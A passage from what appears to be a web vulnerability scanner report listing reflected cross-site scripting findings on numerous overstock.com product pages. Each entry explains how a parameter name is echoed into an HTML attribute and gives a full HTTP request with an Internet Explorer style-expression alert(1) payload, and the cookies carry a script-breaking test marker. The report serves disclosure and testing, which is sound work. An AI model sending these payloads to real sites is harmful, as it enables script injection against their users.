GET /Home-Garden/Glow-Modern-Frameless-Wall-Mirror/4311800/product.html?a9667"style%3d"x%3aexpression(alert(1))"edd683c3161=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.238. http://www.overstock.com/Home-Garden/Graceland-Arm-Chair-Nutmeg/4101317/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0dc9"style%3d"x%3aexpression(alert(1))"fe1391b667f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0dc9"style="x:expression(alert(1))"fe1391b667f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Graceland-Arm-Chair-Nutmeg/4101317/product.html?a0dc9"style%3d"x%3aexpression(alert(1))"fe1391b667f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.239. http://www.overstock.com/Home-Garden/Grand-Hotel-Cotton-Blanket/4577593/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31f97"style%3d"x%3aexpression(alert(1))"32748b28e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31f97"style="x:expression(alert(1))"32748b28e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Grand-Hotel-Cotton-Blanket/4577593/product.html?31f97"style%3d"x%3aexpression(alert(1))"32748b28e8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.240. http://www.overstock.com/Home-Garden/Grommet-Top-Thermal-Insulated-84-inch-Blackout-Curtain-Panel-Pair/4359827/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71353"style%3d"x%3aexpression(alert(1))"7a83e17dfe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71353"style="x:expression(alert(1))"7a83e17dfe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Grommet-Top-Thermal-Insulated-84-inch-Blackout-Curtain-Panel-Pair/4359827/product.html?71353"style%3d"x%3aexpression(alert(1))"7a83e17dfe9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.241. http://www.overstock.com/Home-Garden/Haan-Steam-Cleaner-Multipurpose-Steamer/3907240/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f59"style%3d"x%3aexpression(alert(1))"173a771f5e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88f59"style="x:expression(alert(1))"173a771f5e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Haan-Steam-Cleaner-Multipurpose-Steamer/3907240/product.html?88f59"style%3d"x%3aexpression(alert(1))"173a771f5e1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.242. http://www.overstock.com/Home-Garden/Hand-painted-Abstract-Canvas-Art-Set/4121697/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d759"style%3d"x%3aexpression(alert(1))"c939dc686b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d759"style="x:expression(alert(1))"c939dc686b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hand-painted-Abstract-Canvas-Art-Set/4121697/product.html?9d759"style%3d"x%3aexpression(alert(1))"c939dc686b9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.243. http://www.overstock.com/Home-Garden/Hand-painted-Oil-Abstract-Canvas-Art-Set-of-3/4082140/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9cf6"style%3d"x%3aexpression(alert(1))"071d60638ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9cf6"style="x:expression(alert(1))"071d60638ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hand-painted-Oil-Abstract-Canvas-Art-Set-of-3/4082140/product.html?a9cf6"style%3d"x%3aexpression(alert(1))"071d60638ba=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.244. http://www.overstock.com/Home-Garden/Hand-painted-Oil-on-Gallery-wrapped-Canvas-Art-Set-of-3/4081979/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46a7"style%3d"x%3aexpression(alert(1))"27661b07b1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c46a7"style="x:expression(alert(1))"27661b07b1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hand-painted-Oil-on-Gallery-wrapped-Canvas-Art-Set-of-3/4081979/product.html?c46a7"style%3d"x%3aexpression(alert(1))"27661b07b1f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.245. http://www.overstock.com/Home-Garden/Hand-tufted-Eastern-Colors-Brown-Wool-Rug-8-x-10/4579340/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1c03"style%3d"x%3aexpression(alert(1))"7068bc8c8f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1c03"style="x:expression(alert(1))"7068bc8c8f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hand-tufted-Eastern-Colors-Brown-Wool-Rug-8-x-10/4579340/product.html?f1c03"style%3d"x%3aexpression(alert(1))"7068bc8c8f5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.246. http://www.overstock.com/Home-Garden/Hand-woven-Shag-Solo-Honey-White-Rug-5-x-8/2542570/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4878e"style%3d"x%3aexpression(alert(1))"d7c91a1e8a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4878e"style="x:expression(alert(1))"d7c91a1e8a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hand-woven-Shag-Solo-Honey-White-Rug-5-x-8/2542570/product.html?4878e"style%3d"x%3aexpression(alert(1))"d7c91a1e8a1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.247. http://www.overstock.com/Home-Garden/Hand-woven-Shag-Solo-Honey-White-Rug-76-x-96/2542571/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b5c"style%3d"x%3aexpression(alert(1))"e6166a3d19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73b5c"style="x:expression(alert(1))"e6166a3d19b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hand-woven-Shag-Solo-Honey-White-Rug-76-x-96/2542571/product.html?73b5c"style%3d"x%3aexpression(alert(1))"e6166a3d19b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.248. http://www.overstock.com/Home-Garden/Handcrafted-Birchwood-8-piece-Comforter-Set/4141981/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee2a"style%3d"x%3aexpression(alert(1))"958302fbbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ee2a"style="x:expression(alert(1))"958302fbbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Handcrafted-Birchwood-8-piece-Comforter-Set/4141981/product.html?4ee2a"style%3d"x%3aexpression(alert(1))"958302fbbd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.249. http://www.overstock.com/Home-Garden/Handcrafted-Peyton-Place-8-piece-Comforter-Set/4141985/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 731d3"style%3d"x%3aexpression(alert(1))"66deb2ef695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 731d3"style="x:expression(alert(1))"66deb2ef695 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Handcrafted-Peyton-Place-8-piece-Comforter-Set/4141985/product.html?731d3"style%3d"x%3aexpression(alert(1))"66deb2ef695=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.250. http://www.overstock.com/Home-Garden/Havana-Floral-Duvet-Cover-Set/3231682/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6835e"style%3d"x%3aexpression(alert(1))"69a4e004e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6835e"style="x:expression(alert(1))"69a4e004e1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Havana-Floral-Duvet-Cover-Set/3231682/product.html?6835e"style%3d"x%3aexpression(alert(1))"69a4e004e1d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.251. http://www.overstock.com/Home-Garden/Hayden-Black-Cherry-Pub-Dining-Table-with-Leaf/3134564/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcb9"style%3d"x%3aexpression(alert(1))"e6d508cd907 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dcb9"style="x:expression(alert(1))"e6d508cd907 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
